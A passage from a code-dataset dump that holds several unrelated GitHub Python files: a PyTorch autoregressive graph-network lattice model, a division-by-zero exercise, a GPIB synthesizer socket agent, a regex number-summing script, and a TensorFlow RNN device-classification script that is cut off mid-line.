x.view(z.size()[:-1]+torch.Size(self.lattice.shape))\n \n def _inverse(self, x):\n y = x.flatten(-self.lattice.dimension)[...,self.lattice.node_index]\n def renormalize(y):\n if y.size(-1) > 1:\n y0 = y[...,0::2]\n y1 = y[...,1::2]\n return torch.cat((renormalize(y0), self.group.mul(self.group.inv(y0), y1)), -1)\n else:\n return y\n z = renormalize(y)\n return z\n \n def log_abs_det_jacobian(self, x, y):\n return torch.tensor(0.)\n\nclass OneHotCategoricalTransform(dist.Transform):\n \"\"\"Convert between one-hot and categorical representations.\n \n Args:\n num_classes: number of classes.\"\"\"\n def __init__(self, num_classes: int):\n super(OneHotCategoricalTransform, self).__init__()\n self.num_classes = num_classes\n self.bijective = True\n \n def _call(self, x):\n # one-hot to categorical\n return x.max(dim=-1)[1]\n \n def _inverse(self, y):\n # categorical to one-hot\n return F.one_hot(y, self.num_classes).to(dtype=torch.float)\n \n def log_abs_det_jacobian(self, x, y):\n return torch.tensor(0.)\n\n\"\"\" -------- Base Distribution -------- \"\"\"\n\nclass GraphConv(nn.Module):\n \"\"\" Graph Convolution layer \n \n Args:\n graph: tensor of shape [3, num_edges] \n specifying (source, target, type) along each column\n in_features: number of input features (per node)\n out_features: number of output features (per node)\n bias: whether to learn an edge-depenent bias\n self_loop: whether to include self loops in message passing\n \"\"\"\n def __init__(self, graph: torch.Tensor, in_features: int, out_features: int,\n bias: bool = True, self_loop: bool = True):\n super(GraphConv, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n if bias:\n self.bias = bias\n else:\n self.register_parameter('bias', None)\n self.edge_types = None\n self.update_graph(graph)\n self.self_loop = self_loop\n\n def update_graph(self, graph):\n # update the graph, adding new linear maps if needed\n self.graph = graph\n edge_types = graph[-1].max() + 1\n if edge_types != self.edge_types:\n self.weight = nn.Parameter(torch.Tensor(edge_types, self.out_features, self.in_features))\n if self.bias is not None:\n self.bias = nn.Parameter(torch.Tensor(edge_types, self.out_features))\n self.reset_parameters()\n self.edge_types = edge_types\n return self\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound)\n \n def extra_repr(self):\n return 'edge_types={}, in_features={}, out_features={}, bias={}, self_loop={}'.format(\n self.edge_types, self.in_features, self.out_features, self.bias is not None, self.self_loop)\n\n def forward(self, input, j = None):\n # forward from a source node, indexed by j\n # if j is None, forward all nodes\n if j is None: # forward all nodes together\n if self.self_loop: # if self loop allowed\n typ0 = 0 # typ starts from 0\n else: # if self loop forbidden\n typ0 = 1 # typ starts from 1\n output = None\n for typ in range(typ0, self.edge_types):\n mask = (self.graph[2] == typ)\n if output is None:\n output = self.propagate_homo(self.graph[:2, mask], input, typ)\n else:\n output += self.propagate_homo(self.graph[:2, mask], input, typ)\n else: # forward from specific node\n graph = self.graph\n mask = (graph[0] == j) # mask out edges from other nodes\n graph = graph[:, mask]\n if not self.self_loop: # no self loop\n mask = (graph[2] != 0) # mask out self loops\n graph = graph[:, mask]\n output = self.propagate_hetero(graph, input)\n return output\n\n def propagate_homo(self, graph, input, typ):\n [source, target] = graph\n signal = input[..., source, :] # shape [..., E, in_features]\n if self.bias is None:\n message = F.linear(signal, self.weight[typ]) # shape: [..., E, out_features]\n else:\n message = F.linear(signal, self.weight[typ], self.bias[typ]) # shape: [..., E, out_features]\n output = torch_scatter.scatter_add(message, target,\n dim = -2, dim_size = input.size(-2))\n return output # shape: [..., N, out_features]\n\n def propagate_hetero(self, graph, input):\n # input: shape [..., N, in_features]\n [source, target, edge_type] = graph\n signal = input[..., source, :] # shape [..., E, in_features]\n weight = self.weight[edge_type] # shape [E, out_features, in_features]\n message = torch.sum(weight * signal.unsqueeze(-2), -1) # shape [..., E, out_features]\n if self.bias is not None:\n bias = self.bias[edge_type] # shape [E, out_features]\n message += bias\n output = torch_scatter.scatter_add(message, target,\n dim = -2, dim_size = input.size(-2))\n return output # shape: [..., N, out_features]\n\nclass Autoregressive(nn.Module, dist.Distribution):\n \"\"\" Represent a generative model that can generate samples and evaluate log probabilities.\n \n Args:\n lattice: lattice system\n features: a list of feature dimensions for all layers\n nonlinearity: activation function to use \n bias: whether to learn the bias\n \"\"\"\n \n def __init__(self, lattice: Lattice, features, nonlinearity: str = 'Tanh', bias: bool = True):\n super(Autoregressive, self).__init__()\n self.lattice = lattice\n self.nodes = lattice.sites\n self.features = features\n dist.Distribution.__init__(self, event_shape=torch.Size([self.nodes, self.features[0]]))\n self.has_rsample = True\n self.graph = self.lattice.causal_graph()\n self.layers = nn.ModuleList()\n for l in range(1, len(self.features)):\n if l == 1: # the first layer should not have self loops\n self.layers.append(GraphConv(self.graph, self.features[0], self.features[1], bias, self_loop = False))\n else: # remaining layers are normal\n self.layers.append(nn.LayerNorm([self.features[l - 1]]))\n self.layers.append(getattr(nn, nonlinearity)()) # activatioin layer\n self.layers.append(GraphConv(self.graph, self.features[l - 1], self.features[l], bias))\n\n def update_graph(self, graph):\n # update graph for all GraphConv layers\n self.graph = graph\n for layer in self.layers:\n if isinstance(layer, GraphConv):\n layer.update_graph(graph)\n return self\n\n def forward(self, input):\n output = input\n for layer in self.layers: # apply layers\n output = layer(output)\n return output # logits\n \n def log_prob(self, sample):\n logits = self(sample) # forward pass to get logits\n return torch.sum(sample * F.log_softmax(logits, dim=-1), (-2,-1))\n\n def sampler(self, logits, dim=-1): # simplified from F.gumbel_softmax\n gumbels = -torch.empty_like(logits, memory_format=torch.legacy_contiguous_format).exponential_().log()\n gumbels += logits.detach()\n index = gumbels.max(dim, keepdim=True)[1]\n return torch.zeros_like(logits, memory_format=torch.legacy_contiguous_format).scatter_(dim, index, 1.0)\n\n def _sample(self, sample_size: int, sampler = None):\n if sampler is None: # if no sampler specified, use default\n sampler = self.sampler\n # create a list of tensors to cache layer-wise outputs\n cache = [torch.zeros(sample_size, self.nodes, self.features[0], device=device)]\n for layer in self.layers:\n if isinstance(layer, GraphConv): # for graph convolution layers\n features = layer.out_features # features get updated\n cache.append(torch.zeros(sample_size, self.nodes, features, device=device))\n # cache established. start by sampling node 0.\n # assuming global symmetry, node 0 is always sampled uniformly\n cache[0][..., 0, :] = sampler(cache[0][..., 0, :])\n # start autoregressive sampling\n for j in range(1, self.nodes): # iterate through nodes 1:all\n for l, layer in enumerate(self.layers):\n if isinstance(layer, GraphConv): # for graph convolution layers\n if l==0: # first layer should forward from previous node\n cache[l + 1] += layer(cache[l], j - 1)\n else: # remaining layers forward from this node\n cache[l + 1] += layer(cache[l], j)\n else: # for other layers, only update node j (other nodes not ready yet)\n src = layer(cache[l][..., [j], :])\n index = src.new_full(src.size(), j, dtype=torch.long)\n cache[l + 1] = cache[l + 1].scatter(-2, index, src)\n # the last cache hosts the logit, sample from it \n cache[0][..., j, :] = sampler(cache[-1][..., j, :])\n return cache # cache[0] hosts the sample\n \n def sample(self, sample_size=1):\n with torch.no_grad():\n cache = self._sample(sample_size)\n return cache[0]\n \n def rsample(self, sample_size=1, tau=None, hard=False):\n # reparametrized Gumbel sampling\n if tau is None: # if temperature not given\n tau = 1/(self.features[-1]-1) # set by the out feature dimension\n cache = self._sample(sample_size, lambda x: F.gumbel_softmax(x, tau, hard))\n return cache[0]\n\n def sample_with_log_prob(self, sample_size=1):\n cache = self._sample(sample_size)\n sample = cache[0]\n logits = cache[-1]\n log_prob = torch.sum(sample * F.log_softmax(logits, dim=-1), (-2,-1))\n return sample, log_prob\n\n\n\"\"\" -------- Model Interface -------- \"\"\"\n\nclass HolographicPixelGNN(nn.Module, dist.TransformedDistribution):\n \"\"\" Combination of hierarchical autoregressive and flow-based model for lattice models.\n \n Args:\n energy: a energy model to learn\n hidden_features: a list of feature dimensions of hidden layers\n nonlinearity: activation function to use \n bias: whether to learn the additive bias in heap linear layers\n \"\"\"\n def __init__(self, energy: Energy, hidden_features, nonlinearity: str = 'Tanh', bias: bool = True):\n super(HolographicPixelGNN, self).__init__()\n self.energy = energy\n self.group = energy.group\n self.lattice = energy.lattice\n self.haar = HaarTransform(self.group, self.lattice)\n self.onecat = OneHotCategoricalTransform(self.group.order)\n features = [self.group.order] + hidden_features + [self.group.order]\n auto = Autoregressive(self.lattice, features, nonlinearity, bias)\n dist.TransformedDistribution.__init__(self, auto, [self.onecat, self.haar])\n self.transform = dist.ComposeTransform(self.transforms)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"EverettYou/AutoregressiveStatMech","sub_path":"pixel_gnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":24487,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"10440976245","text":"# 1.\tDivision Error Handling: Write a program that takes two numbers as input and handles the division by zero exception using a try-except block.\n\na=int(input(\"enter the first number:\"))\nb=int(input(\"enter the second numbeer:\"))\n\n\ntry:\n\n c=a/b\n print(\"Result: \",c)\nexcept:\n print(\"can't divide by zero....!\")\nelse:\n print(a/b)\n","repo_name":"shiixxam/python_in_30_days","sub_path":"python/Day10/Exception handling/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1937563539","text":"import re\nimport socket\nfrom agent import Agent\n\nclass SynthAgent(Agent):\n def __init__(self, addr=('gpib_adapter', 1234)):\n self.__addr = addr\n self.__keys = ['CFRQ/VALUE', 'RFLV/VALUE']\n self.__term = '\\n'\n\n def _recv(self):\n data = ''\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(self.__addr)\n conn.settimeout(10)\n conn.send('++read' + self.__term)\n while data.find(self.__term) < 0:\n data += conn.recv(1024)\n conn.close()\n return data[:data.find(self.__term)]\n\n def _send(self, data):\n data = data.strip()\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(self.__addr)\n conn.send(data + self.__term)\n conn.close()\n\n def get(self, keys=['index']):\n result = []\n if keys != ['index']:\n for key in keys:\n if key not in self.__keys:\n result.append('Error')\n continue\n if key.find('/') < 0: key += '/VALUE'\n self._send(str(key).replace('/', ':') + '?')\n #!!! More logic is probably necessary to filter\n #!!! what comes back\n #result.append(self._recv().strip(': \\n'))\n # Default to MHz for center freq. value.\n received = self._recv().strip(': \\n')\n if key == 'CFRQ/VALUE':\n result.append(re.sub('000000.0$', 'M', received, 1) + 'Hz')\n else:\n result.append(received)\n else:\n result = self.__keys\n return result\n\n def set(self, keys, values):\n \"\"\"Sets parameters for the Synthesizer.\n\n Attmempts to ensure that the value was set correctly by writing\n then reading back and checking the value against the request.\n \"\"\"\n #!!! Stress test\n result = []\n for key, value in zip(keys, values):\n #self._send('%s %s' % (key.replace('/', ':'), value))\n # Default to MHz for center freq. value.\n if key == 'CFRQ/VALUE':\n value = value.strip('MmHhZz') + '000000'\n self._send('%s %s' % (key.replace('/', ':'), value))\n test = self.get([key])[0].replace('M', '000000').strip('HhZz')\n if key.find('/') < 0:\n regex = re.compile('[0-9]+\\.[0-9]+;', re.IGNORECASE)\n match = regex.search(test)\n if match:\n test = match.group()\n tmp = value.replace('M', '000000').strip('HhZz')\n result.append(\n str(float(tmp) == float(test[:-1])))\n else:\n result.append('False')\n else:\n tmp = value.replace('M', '000000').strip('HhZz')\n result.append(str(float(tmp) == float(test)))\n return result\n\n#AgentClass = SynthAgent\n","repo_name":"nrao/guppi-controller","sub_path":"src/synth_agent.py","file_name":"synth_agent.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"21937600468","text":"#!/usr/local/bin/python3\n\nimport re\n\nfname = input(\"Enter file name: \")\nfh = open(fname)\nsum = 0\n\nfor line in fh:\n nums_in_line = re.findall('[0-9]+', line)\n if len(nums_in_line) > 0:\n for num_string in nums_in_line:\n sum = sum + int(num_string)\n else:\n continue\nfh.close()\nprint(sum)\n","repo_name":"druidix/py4e","sub_path":"regex-find-sum.py","file_name":"regex-find-sum.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17205729064","text":"#!/bin/python\r\n\r\n# Blake A Holman\r\n# Neural Network using Tensorflow\r\n# URL: https://blog.goodaudience.com/first-experience-of-building-a-lstm-model-with-tensorflow-e632bde911e1\r\n\r\nimport sys\r\n\r\n# Ignore Future warning error\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', category=FutureWarning)\r\nwarnings.filterwarnings('ignore')\r\n# Check that the python version being used is Python3\r\nmajor_python_version = sys.version_info[0]\r\nif major_python_version != 3:\r\n\tprint(\"ERROR: You need to use Python 3 to run this program\")\r\n\texit(1)\r\n\r\nimport tensorflow as tf # Machine Learning framework\r\nimport numpy as np # Array and matrix library\r\n#from tensorflow.contrib import rnn\r\n#from tensorflow import keras\r\n#from sklearn.model_selection import train_test_split\r\n#from sklearn.metrics import f1_score, accuracy_score, recall_score, precision_score\r\n#import Get_NN_Input_ToCSV\r\nimport csv # Read CSV labels\r\nimport json\r\nimport os\r\nimport random\r\n\r\ndef main():\r\n\t## Read Data ##\r\n\tprint(\"Getting Neural Network Input\")\r\n\t#device_ids, device_withConvNum, path = Get_NN_Input_ToCSV.main()\r\n\r\n\tpath = \"json_conv\"\r\n\r\n\t## Setup RNN ##\r\n\t# Parameter Specification\r\n\tn_classes = 9\t# Number of output nodes/classification types\r\n\tn_units = 18\t# Size of hidden state\r\n\tprint(\"hidden layer size = \", n_units)\r\n\tn_features = 2\t# Number of features in the dataset\r\n\r\n\t# Define Placeholders\r\n\ttf.compat.v1.disable_eager_execution()\r\n\txplaceholder= tf.compat.v1.placeholder('float',[None,n_features], name=\"xplaceholder\") # Holds batch of feature data\r\n\typlaceholder = tf.compat.v1.placeholder('float',[n_classes], name=\"yplaceholder\") # Holds batch of label data\r\n\r\n\t# Setup Rnn\r\n\tprint(\"Setting Up Neural Network\")\r\n\tcost, optimizer, logit, accuracy, pred = setup_neural_network(xplaceholder, yplaceholder, n_features, n_units, n_classes)\r\n\r\n\t## Get Device Labels ##\r\n\t# Seperate Features and Labels\r\n\tlabels_path = 'device_labels.csv'\r\n\tdevice_labels = {}\r\n\r\n\t# Open CSV file and finds device labels\r\n\tf = open(labels_path)\r\n\tlabels_file = csv.reader(f, delimiter=',')\r\n\tline_count = 0\r\n\tfor row in labels_file:\r\n\t\tif len(row) > 0 and str(row[0]) != \"\" and line_count > 0:\r\n\t\t\t# Add the current entry to labels\r\n\t\t\tdevice_labels[str(row[0])] = int(row[3])\r\n\t\tline_count += 1\r\n\tf.close()\r\n\r\n\tsaver = tf.compat.v1.train.Saver()\r\n\t# Gets data for each device and runs through neural network\r\n\twith tf.compat.v1.Session() as sess:\r\n\t\ttf.compat.v1.global_variables_initializer().run()\r\n\t\ttf.compat.v1.local_variables_initializer().run()\r\n\t\t\r\n\t\tfiles_perClass = 5000\r\n\t\ttotal_acc = 0\r\n\t\ttotal_it = 0\r\n\r\n\t\tfor iters in range(20):\r\n\t\t\tX_train_files = []\r\n\t\t\tX_train = []\r\n\t\t\ty_train = []\r\n\t\t\ty_train_overall = []\r\n\t\t\ttotal_train_files = 0\r\n\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_0\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_0\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([1,0,0,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_1\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_1\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,1,0,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_2\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_2\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,1,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_3\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_3\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,1,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_4\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_4\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,1,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_5\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_5\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,1,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_6\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_6\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,1,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_7\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_7\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,0,1,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_8\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_8\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,0,0,1])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\t\r\n\t\t\tprint(\"Shuffling Train Data\")\r\n\t\t\tindex_shuf = list(range(len(X_train_files)))\r\n\t\t\trandom.shuffle(index_shuf)\r\n\t\t\t\r\n\t\t\tfor i in index_shuf:\r\n\t\t\t\tclass_index = np.argmax(np.array(y_train_overall[i]))\r\n\t\t\t\tclass_name = str(\"class_\" + str(class_index))\r\n\r\n\t\t\t\tf = open(os.path.join(os.getcwd(), path, class_name, str(X_train_files[i])))\r\n\t\t\t\tconv_file = csv.reader(f, delimiter=',')\r\n\t\t\t\tconv = []\r\n\t\t\t\tfor row in conv_file:\r\n\t\t\t\t\tif len(row) > 0:\r\n\t\t\t\t\t\ttL = []\r\n\t\t\t\t\t\ttL.append(float(row[0]))\r\n\t\t\t\t\t\ttL.append(float(row[1]))\r\n\t\t\t\t\t\tconv.append(tL)\r\n\t\t\t\tX_train.append(conv)\r\n\t\t\t\ty_train.append(y_train_overall[i])\r\n\t\t\t\tf.close()\r\n\r\n\t\t\ttotal_acc += train_neural_network(sess,X_train,y_train,xplaceholder,yplaceholder,cost,optimizer, accuracy,total_train_files)\r\n\t\t\ttotal_it += 1\r\n\r\n\t\tTraining_Accuracy = total_acc / total_it\r\n\t\tprint(\"Total Training Accuracy\", Training_Accuracy)\r\n\r\n\t\tsaver.save(sess,\"my_test_model\")\r\n\r\n\t\t#True_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0,\"9\": 0,\"10\": 0,\"11\": 0,\"12\": 0,\"13\": 0,\"14\": 0,\"15\": 0,\"16\": 0,\"17\": 0,\"18\": 0,\"19\": 0,\"20\": 0}\r\n\t\t#Total_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0,\"9\": 0,\"10\": 0,\"11\": 0,\"12\": 0,\"13\": 0,\"14\": 0,\"15\": 0,\"16\": 0,\"17\": 0,\"18\": 0,\"19\": 0,\"20\": 0}\r\n\t\tTrue_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\t\tTotal_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\t\tmax_distance = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\r\n\t\twrong_id = {\"class_0\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_1\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_2\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_3\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_4\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_5\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_6\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_7\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_8\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}}\r\n\t\t\r\n\t\ttest_files_perClass = 500\r\n\r\n\t\tfor iters in range(20):\r\n\t\t\tX_test_files = []\r\n\t\t\tX_test = []\r\n\t\t\ty_test = []\r\n\t\t\ty_test_overall = []\r\n\t\t\ttest_total_files = 0\r\n\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_0\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_0\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([1,0,0,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_1\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_1\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,1,0,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_2\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_2\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,1,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_3\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_3\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,1,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_4\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_4\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,1,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_5\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_5\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,1,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_6\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_6\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,1,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_7\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_7\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,0,1,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_8\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_8\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,0,0,1])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\t\r\n\t\t\tprint(\"Shuffling Test Data\")\r\n\t\t\tindex_shuf = list(range(len(X_test_files)))\r\n\t\t\trandom.shuffle(index_shuf)\r\n\r\n\t\t\tlabel_dist = {\"0\":[], \"1\":[], \"2\":[], \"3\":[], \"4\":[], \"5\":[], \"6\":[], \"7\":[], \"8\":[]}\r\n\t\t\t\r\n\t\t\tfor i in index_shuf:\r\n\t\t\t\tclass_index = np.argmax(np.array(y_test_overall[i]))\r\n\t\t\t\tclass_name = str(\"class_\" + str(class_index))\r\n\r\n\t\t\t\tf = open(os.path.join(path, class_name, str(X_test_files[i])))\r\n\t\t\t\tconv_file = csv.reader(f, delimiter=',')\r\n\t\t\t\tconv = []\r\n\t\t\t\tfor row in conv_file:\r\n\t\t\t\t\tif len(row) > 0:\r\n\t\t\t\t\t\ttL = []\r\n\t\t\t\t\t\ttL.append(float(row[0]))\r\n\t\t\t\t\t\ttL.append(float(row[1]))\r\n\t\t\t\t\t\tconv.append(tL)\r\n\t\t\t\tX_test.append(conv)\r\n\t\t\t\ty_test.append(y_test_overall[i])\r\n\t\t\t\tf.close()\r\n\r\n\t\t\tlabel = 0\r\n\t\t\tfor c in X_test:\r\n\t\t\t\ty = y_test[label]\r\n\t\t\t\tTF, max_index, label_dist = test_neural_network(sess,pred,xplaceholder,yplaceholder,c,y,max_distance, label_dist)\r\n\t\t\t\tfor i in range(len(y)):\r\n\t\t\t\t\tif y[i] == 1 and TF:\r\n\t\t\t\t\t\tTrue_Number[str(i)] += 1\r\n\t\t\t\t\t\tTotal_Number[str(i)] += 1\r\n\t\t\t\t\telif y[i] == 1:\r\n\t\t\t\t\t\tTotal_Number[str(i)] += 1\r\n\t\t\t\t\t\twrong_id[str(\"class_\" + str(i))][str(max_index)] += 1\r\n\t\t\t\tlabel += 1\r\n\t\t\t\r\n\t\tmax_distance = __findMaxDist(label_dist)\r\n\r\n\t\tprint(\"Correctly predicted convs: \")\r\n\t\tprint(json.dumps(True_Number, sort_keys=True))\r\n\t\twith open(\"True_Number_Convs.json\", \"w\") as f:\r\n\t\t\tjson.dump(True_Number, f)\r\n\r\n\t\tprint(\"Total convs tested: \")\r\n\t\tprint(json.dumps(Total_Number, sort_keys=True))\r\n\t\twith open(\"Total_Number_Convs.json\", \"w\") as f:\r\n\t\t\tjson.dump(True_Number, 